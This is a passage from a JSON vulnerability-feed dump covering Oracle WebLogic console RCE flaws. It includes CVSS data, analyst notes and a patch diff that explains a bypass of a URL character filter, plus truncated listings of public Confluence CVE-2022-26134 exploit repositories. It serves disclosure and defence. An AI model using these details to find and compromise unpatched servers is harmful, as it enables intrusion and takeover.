14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14883 \u2014 Authenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14883", "CVE-2021-26084"], "modified": "2020-10-29T00:00:00", "id": "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "href": "https://attackerkb.com/topics/XrIT8vLY22/cve-2020-14883-authenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-02T17:14:41", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**wvu-r7** at November 02, 2020 10:26pm UTC reported:\n\nCVE-2020-14750 appears to be the patch bypass for [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server>). Please see CVE-2020-14882\u2019s [Rapid7 analysis](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server#rapid7-analysis>) for more information. The CVE-2020-14750 patch is reproduced below.\n \n \n --- patched1/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java\t2020-11-02 13:13:28.000000000 -0600\n +++ patched2/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java\t2020-11-02 12:11:01.000000000 -0600\n @@ -2,6 +2,7 @@\n \n import com.bea.netuix.servlets.manager.SingleFileServlet;\n import java.io.IOException;\n +import java.util.List;\n import javax.servlet.ServletConfig;\n import javax.servlet.ServletException;\n import javax.servlet.ServletRequest;\n @@ -20,8 +21,6 @@\n \n private static final long serialVersionUID = 1L;\n \n - private static final String[] IllegalUrl = new String[] { \";\", \"%252E%252E\", \"%2E%2E\", \"..\", \"%3C\", \"%3E\", \"<\", \">\" };\n - \n public static void initMBean() {\n MBeanUtilsInitializer.initMBeanAsynchronously();\n }\n @@ -39,8 +38,9 @@\n if (req instanceof HttpServletRequest) {\n HttpServletRequest httpServletRequest = (HttpServletRequest)req;\n String url = httpServletRequest.getRequestURI();\n - for (int i = 0; i < IllegalUrl.length; i++) {\n - if (url.contains(IllegalUrl[i])) {\n + if (!ConsoleUtils.isUserAuthenticated(httpServletRequest))\n + throw new ServletException(\"User not authenticated.\"); \n + if (!isValidUrl(url, httpServletRequest)) {\n if (resp instanceof HttpServletResponse) {\n LOG.error(\"Invalid request URL detected. \");\n HttpServletResponse httpServletResponse = (HttpServletResponse)resp;\n @@ -49,7 +49,6 @@\n return;\n } \n } \n - } \n try {\n super.service(req, resp);\n } catch (IllegalStateException e) {\n @@ -60,4 +59,15 @@\n LOG.debug(e); \n } \n }\n + \n + private boolean isValidUrl(String url, HttpServletRequest req) {\n + String consoleContextPath = ConsoleUtils.getConsoleContextPath();\n + List<String> portalList = ConsoleUtils.getConsolePortalList();\n + for (String portal : portalList) {\n + String tmp = \"/\" + consoleContextPath + portal;\n + if (url.equals(tmp))\n + return true; \n + } \n + return false;\n + }\n }\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-02T00:00:00", "type": "attackerkb", "title": "CVE-2020-14750 \u2014 Oracle WebLogic Remote Unauthenticated Remote Code Execution (RCE) Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2021-26084"], "modified": "2020-11-19T00:00:00", "id": "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "href": "https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T18:27:50", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**elligottmc** at October 29, 2020 2:27pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**ccondon-r7** at November 01, 2020 4:19pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**lvarela-r7** at October 29, 2020 12:41pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14882 \u2014 Unauthenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555", "CVE-2021-26084"], "modified": "2020-12-28T00:00:00", "id": "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "href": "https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-07-13T08:06:38", "description": "### CVE-2022-26134\n\nConfluence Server and Data Center - CVE-2022...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T04:30:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-13T07:42:16", "id": "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-03T08:04:53", "description": "# Confluence Pre-Auth Remote Code Execution via OGNL Injection (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T02:43:06", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-03T06:33:23", "id": "B47171B0-339A-582E-8AAC-3B18373664B7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-15T07:58:22", "description": "# CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T18:23:20", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T06:14:20", "id": "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:58:33", "description": "# Atlassian Confluence \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f(CVE-2022-26134)\nFoFa\uff1atitle=\"Con...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T07:54:56", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-09T08:02:12", "id": "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:01", "description": "# 0DAYEXPLOITAtlassianConfluenceCVE-2022-26134\n\nCVE-2022-26134 -...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T19:59:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-13T02:44:50", "id": "66468422-89C0-5AC8-9CEA-6B512338FF7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-29T17:23:14", "description": "# Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T11:17:25", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-29T16:55:14", "id": "0E5BE237-A243-54B8-9AD7-92FBA10D1FA2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:19", "description": "CVE-2022-26134 poc\r\n\r\n\u58f0\u660e:\u8be5POC\u4ec5\u4f9b\u4e8e\u5b66\u4e60\u4e13\u7528\uff0c\u7981\u6b62\u4e00\u5207\u8fdd\u6cd5\u64cd\u4f5c\uff0c\u5982\u679c\u8fdb\u884c\u6076\u610f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T13:41:25", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-05T13:44:25", "id": "53CC55D8-983C-5FA9-AE81-D20750A6612E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:36", "description": "# CVE-2022-26134\r\n\uff08CVE-2022-26134\uff09an unauthenticated and remote ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:27:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:19:24", "id": "305ADB34-3669-5AAD-8D51-FCFFEF9E3F47", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:15", "description": "# CVE-2022-26134\n\n1) First run the shodan scripts to grabs all t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T20:35:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T15:59:14", "id": "7BE60530-0495-5366-846A-73B1A778DBDA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-20T15:47:00", "description": "# confluencePot\n\nConfluencePot is a simple honeypot for the Atla...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T15:44:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-20T13:48:14", "id": "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:06", "description": "# CVE-2022-2613...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T02:16:56", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T02:20:41", "id": "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:02", "description": "# CVE-2022-26134\nImplementation of CVE-2022-26134\n\nThis reposito...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T08:58:07", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:21:42", "id": "1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-10T16:25:12", "description": "### CVE-2022-26134 - OGNL injection vulnerability:\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:04:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 